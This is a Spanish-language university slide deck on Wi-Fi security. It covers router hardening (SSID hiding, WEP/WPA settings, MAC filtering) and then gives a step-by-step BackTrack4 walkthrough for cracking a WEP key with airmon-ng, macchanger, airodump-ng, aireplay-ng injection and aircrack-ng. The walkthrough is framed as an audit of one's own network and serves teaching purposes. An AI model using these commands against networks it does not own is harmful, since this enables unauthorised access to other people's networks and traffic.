Sunteți pe pagina 1din 53

Universidad de Cundinamarca

PROTECCION DE REDES WI-FI

Objetivos
Dar a conocer la vulnerabilidad de las redes

Wi-Fi en cuanto al tema de seguridad y el gran peligro que corre los propietarios de redes Wi-Fi al ser victimas de un pirata informtico. Presentar las distintas formas de proteger la red Wi-Fi desde el Router y las estrategias que se pueden llevar a cabo para evitar el robo de las contraseas de la misma red.

Planteamiento del problema


La seguridad de las redes Wi-Fi son un tema de

gran importancia en la actualidad dado a la masificacin del mercado de estos sistemas en los hogares gracias a la disminucin del precio de las Laptop, las personas se han visto impulsadas a comprar sistemas de internet inalmbrico en sus hogares con el fin de conectar su Laptop desde cualquier parte de su casa, sin saber la fragilidad en cuanto a seguridad le ha agregado a su punto de acceso a internet.

Agenda
Introduccin a las redes Wi-Fi. El Router Configuracin del Router Verificacin del nivel de vulneravilidad de la

red Wi-Fi

Que son las redes Wi-Fi?


Son un estndar de comunicacin inalmbricas

diseadas en el ao de 1999 con la finalidad de interconectar diferentes tipos de dispositivos a Ethernet. Wi-Fi se establece como norma ante la IEEE como el estndar 802.11, y de esta hay mejoras como lo son la 802.11b que opera en un ancho de banda de 2.4GHz y una velocidad de 11Mbps, esta la 802.11g que funciona a un ancho de banda de 2.4GHz y una velocidad de 54Mbps.

Elementos que componen una red Wi-Fi


Los elementos de una red Wi-Fi son 2 bsicamente: Punto de Acceso o Access Point: Es el dispositivo central de una red Wi-Fi que por medio de ondas de RF se recibe la informacin de los diferentes dispositivos mviles y luego los transmite a la red cableada (Router). Dispositivos fijos y mviles: Son todos aquellos que reciben y envan informacin al punto de acceso va RF (Desktops, Laptops, PDAs, etc.)

Ventajas y desventajas de las redes Wi-Fi


Gracias a que es inalmbrico, dota a los equipos

que poseen acceso a la red Wi-Fi libertad de movimiento o ubicacin dentro de la zona de trabajo donde se tiene la red.
Debido a que el punto de acceso es el aire, la hace accesible a cualquier individuo que se encuentre dentro del alcance de la red Wi-Fi,

razn por la cual tiene grandes inconvenientes en cuanto a temas de seguridad se trata.

Qu es el Router?
Es un dispositivo de la capa tres del modelo OSI,

(Capa de red) que tiene la funcin de interconectar redes de rea local (LAN) y asegura el encaminamiento de paquetes entre redes. Puerta de acceso a internet.

Imagen 1. Aspecto fsico Router Wi-Fi

Tipos de Router
Se pueden identificar 2 tipos:
Router de Red Ncleo: Son los equipos que

constituyen la red de datos de los proveedores de internet de grandes corporaciones.


Router de salida (Gateway o pasarela): Es el

equipo con el que se realiza con el que se realiza la conexin a internet u otra subred.

Imagen 2. Topologa de una conexin de una red LAN con la WAN por medio de un Gateway

rea de trabajo y herramienta a usar en el desarrollo del proyecto


El rea de trabajo para el desarrollo del proyecto como tal es en el Router Wi-Fi, dado que este es el

punto de acceso a internet. La estrategia se basa en optimizar las configuraciones de seguridad del Router con el fin de evitar las intrusiones de personas ajenas a la red. La herramienta de trabajo a usar es BackTrack4, que es una distribucin de Linux pensada en la seguridad informtica.

Router Elegido para el desarrollo del proyecto


El Router elegido para el desarrollo del proyecto es el Router Wi-Fi 3G TP-LINK TL-MR3420, es elegido

debido a que su acceso a Internet es netamente inalmbrico y se realiza por medio de un modem 3.5G. La eleccin de este se debe a que para el momento de presentar el proyecto no se cuenta con puntos fijos de acceso a internet pero no es inconveniente si se desea desarrollar la practica con otro modelo de Router Wi-Fi. A continuacin se presenta una imagen del Router utilizado (Imagen 3).

Imagen 3. Aspecto fsico Router Wi-Fi 3G TP-LINK TL-MR3420

Elementos de configuracin en un Router


El Router cuenta con diferentes parmetros para configurar, por ejemplo se pueden configurar las preferencias en cuanto a nombre del Router, nivel de la seal, tipo de red preferido a utilizar y herramientas de seguridad, que es en donde gira entorno el proyecto y muchas mas herramientas tiles al momento de instalar la red LAN .

CONFIGURANDO EL ROUTER

Paso 1. Configurar el Router


El primer paso es conectarse fsicamente al Router, se puede hacer de dos maneras, una por cable y la otra inalmbrica. La de cable es

bsicamente conectar el cable UTP directo de una salida del Router al PC, la otra forma es ir al centro de conectividad de Windows y buscar el nombre de la red por defecto del Router, para este caso (Imagen 4).

Imagen 4. Aspecto fsico baha de conexiones Router Wi-Fi 3G TP-LINK TL-MR3420

Una vez todo conectado el Router, vamos al

navegador y escribimos la siguiente direccin IP, 192.168.1.1, luego el Router en la pantalla de Windows nos va a indicar la que se debe el nombre y la contrasea de administrador, que por defecto para este Router es admin las dos. De esta manera se tiene acceso al men de settings.

Paso 2. Dando nombre a la red Wi-Fi en el Router


Una vez en el men de Router, nos dirigimos a la pestaa Wireless Settings, donde se tiene una pantalla

como esta (Figura 5). Obsrvese que hay una casilla que se llama SSID, esta casilla es donde se le da nombre al Router, tambin hay otras casillas para seleccionar el canal, el modo de tecnologa Wi-Fi, el ancho del canal, la rata mxima de Tx de datos y un check que es de suma importancia, el enable SSID, el cual es una herramienta que permite ocultar la SSID al momento de montar como tal la red. Este adicionalmente sirve como herramienta de seguridad.

Imagen 5. Pantalla Router de la pestaa Wireless Settings

Paso 3. Dando seguridad a la red Wi-Fi


Ahora nos dirigimos a la ventana Wireless

Security, en esta ventana se encuentra el nivel de seguridad que se le puede dar a la red, es va de acuerdo al nivel de encriptamiento que le demos a la contrasea. Las encriptaciones las hay del modo WEP (Imagen 6), WPA/WPA2 y WPAPSK/WPA2-PSK (Imagen 7).

Imagen 6. Pantalla Router de la pestaa Wireless Security/WEP

Imagen 7. Pantalla Router de la pestaa Wireless Security/WPA, WPA, WPA-PSK, WPA2-PSK

Paso 4. Filtrado de la MAC


A pesar de haber tomado ya todas las medidas de seguridad anteriormente presentadas, aun queda un cierto punto de inseguridad en nuestra red y

como ultima medida y quizs la mas eficiente es desde el Router filtrar la direccin MAC. Qu quiere decir filtrar la direccin MAC? Es que mediante el men de settings del Router se puede dar prioridad de acceso a la red a una lista de direcciones MAC, es decir, solo las direcciones MAC de esa lista tienen acceso a la red.

El procedimiento del filtrado de la MAC se

presenta en las imgenes 8 y 9, en donde se puede observar que para hacer el filtrado de la MAC solo se necesita habilitar la opcin y adicionar las direcciones MAC a filtrar.

Imagen 8. Primer men para filtrado de la MAC

Imagen 9. Segundo men para filtrado de la MAC

Una vez seleccionado el nivel de seguridad para nuestro Router, procedemos a verificar que tan vulnerable es la seguridad del Router en las diferentes modalidades de encriptacin y para cual fin se hace uso de la herramienta BackTrack4.

A continuacin se presenta una gua de uso del BackTrack4 y la demostracin de vulnerabilidad de seguridad del Router se realiza en vivo.

VERIFICANDO EL NIVEL DE VULNERABILIDAD DE LA RED WI-FI

La Herramienta a usar BackTrack


El BackTrack es una herramienta diseada para la seguridad informtica. La hay de dos versiones, una

en live/CD o live/USB. BackTrack cuenta con gran numero de herramientas como lo son de Recopilacin de Informacin, Mapeo de Puertos, Identificacin de Vulnerabilidades, Anlisis de aplicaciones Web, Anlisis de redes de radio (Wi-Fi, Bluetooth, RFID), Penetracin (Exploits y Kit de herramientas de ingeniera social), Escalada de privilegios, Mantenimiento de Acceso, Forenses, Ingeniera inversa y Voz sobre IP.

Paso 1. Descargar la herramienta e inicializarla en el PC


Para descargar la herramienta basta con ir al siguiente link: http://www.remoteexploit.org/backtrack_download.html Una vez descargada boteamos nuestro PC al encenderlo y luego en la pantalla nos pedir el nombre de usuario y contrasea que por defecto son root y toor. Luego escribimos startx y

esperamos que cargue la interfaz y ya estamos en BackTrack (Imagen 10).

Imagen 10. Interfaz de usuario de l BackTrack

Paso 2. Identificar la interfaz de red que tenemos


Para este paso vamos a la parte inferior y

abrimos una shell, en ella escribimos iwconfig, esto con el fin de identificar las interfaces que tenemos en nuestro PC. Posteriormente buscamos entre estas interfaces la de red Wi-Fi. Esta pueden diferir de un equipo a otro. Observe en la imagen 11 como se debera ver la shell despus de aplicar el comando iwconfig.

Imagen 11. Vista de la shell aplicando comando iwconfig

Paso 3. Iniciar el modo de monitor


En este paso habilitamos nuestra tarjeta de red

con el fin para posteriormente escuchar las redes Wi-Fi. Para hacer esto debemos llevar el BackTrack a modo monitor, esto se realiza por medio del comando airmon-ng start (interfaz identificada en paso 2), (Imagen 12).

Imagen 12. Vista de la shell aplicando comando airmon-ng start wlan0

Paso 3,1. Ocultar la direccin MAC de nuestro equipo. (Opcional)


Si se desea ocultar la direccin MAC de nuestro equipo al momento de realizar el ataque, basta con apagar el modo de escucha con el comando

airmon-ng stop (interfaz identificada en paso 2), luego se da el comando macchanger --mac 00:11:22:33:44:55 (interfaz identificada en paso 2), y listo. Finalmente se vuelve a encender el modo de escucha. (Imagen 13)

Imagen 13. Vista de la shell aplicando comando macchanger

Paso 4. Identificando nuestra red


Aqu la idea es escuchar las redes Wi-Fi, pero la red por inters a escuchar es la que vamos a proteger.

Para hacer esto debemos llevar el BackTrack a el modo escucha, esto se realiza por medio del comando airodump-ng (interfaz identificada en paso 2), donde nos dar a conocer las redes a nuestro alcance por su BSSID, tambin nos presenta datos como lo son la el encriptamiento de la contrasea, el canal de cada una de las redes, la intensidad de la seal, etc. (Imagen 14).

Imagen 14. Vista de la shell aplicando comando airodump-ng

De el paso anterior no olvidar anotar el nombre

de nuestra BSSID a proteger y el numero del canal. Despus de unos segundos y una vez localizada la red de inters procedemos a detener el modo escucha usando las letras ctrl+c.

Paso 5. La autentificacin
Para este paso como su nombre lo dice, vamos a realizar una autentificacin. La finalidad de esta

autentificacin es de asociarnos a la red inalmbrica de inters. Para comenzar la autentificacin debemos darnos un estrechn de manos con la red y esto lo hacemos por medio del comando: airodump-ng -c (canal anotado en el paso anterior) -w (un nombre cualquier para guardar el archivo.cap) --bssid (la BSSI que se haba copiado en el paso anterior) (interfaz identificada en paso 2). (Imagen 15)

Imagen 15. Vista de la shell aplicando comando airodump-ng preparando la autentificacin

Se deja correr el comando airodump-ng -c (canal

anotado en el paso anterior) -w (un nombre cualquier para guardar el archivo.cap) --bssid (la BSSI que se haba copiado en el paso anterior) (interfaz identificada en paso 2) hasta alcanzar como mnimo en #data unos 20mil, entre mas mejor. (Imagen 16)

Imagen 16. Vista de la shell aplicando comando airodump-ng enviando paquetes en bruto

Hora

llego en momento esperado, la autentificacin, primero abrimos una nueva shell y luego introducimos el siguiente comando

aireplay-ng 1 0 -a (#BSSID) -e (nombre de la red) (interfaz identificada en paso 2). (Imagen 17)

Imagen 17. Vista de la shell aplicando comando aireplay ng realizando la autentificacin.

Paso 6. Si es segura nuestra red? La inyeccin lo dir


Como paso final enviamos nuestra inyeccin de

paquetes en bruto. La finalidad de esta inyeccin es de capturar como tal la contrasea de la red inalmbrica de inters. Para comenzar la inyeccin ejecutamos el comando aireplay-ng -3 -b (#BSSID) h xx:xx:xx:xx:xx:xx (interfaz identificada en paso 2). (Imagen 18)

Imagen 18. Vista de la shell aplicando la inyeccin.

Sorpresa, nuestra red aun no es completamente segura


Imagen 19.

Imagen 19. Vista de la shell con la contrasea descubierta.

Resumen general de instrucciones

1) 2) 3) 4) 5) 6) 7) 8)

9)

primera shell airmon-ng airmon-ng stop [wlan0,wifi0, eth0, eth1 ] macchanger --mac 00:11:22:33:44:55 wlan0 airmon-ng start wlan0 airodump-ng wlan0 detener con Ctrl + C copiar BSSID airodump-ng -c (chanel [CH]) -w (nombre cualquiera para guardar el archivo .cap) --bssid (la BSSI que se habia copiado al inicio) wlan0 abrir una nueva shell

segunda shell 10) aireplay-ng -1 0 -a (BSSID) -e (nombre de la red wifi) wlan0 11) aireplay-ng -3 -b (BSSID) -h 00:11:22:33:44:55 wlan0

tercera shell 12) aircrack-ng (nombre del paquete .cap)

Conclusiones

Bibliografa

[1] Proteccin a redes Wi-Fi, ayuda de internet y tutoriales, disponible en la pgina de internet: http://www.ayuda-internet.net/tutoriales.html [2] Seguridad inalmbrica, REUTER, captulo I y II. Direccin de correo electrnico hellreuter@gmail.com [3] Cmo proteger nuestra WIFI de los vecinos (para novatos), videos parte 1-4, mundo digital, disponible en la pgina de internet: http://www.mundodigital.net [4] otros video-materiales: Crack wep by golden soldier Red wifi con nombre oculto Crack WPAWPA2 Backtrack 4 Tutorial para Choriarle el Wi Fi al Vecino (Claves WEP) An Introduction to Backtrack 4 Final TPLINK Como configurar Roteador TL wr740n com Virtua SPEEDY (www.professorramos.com)

S-ar putea să vă placă și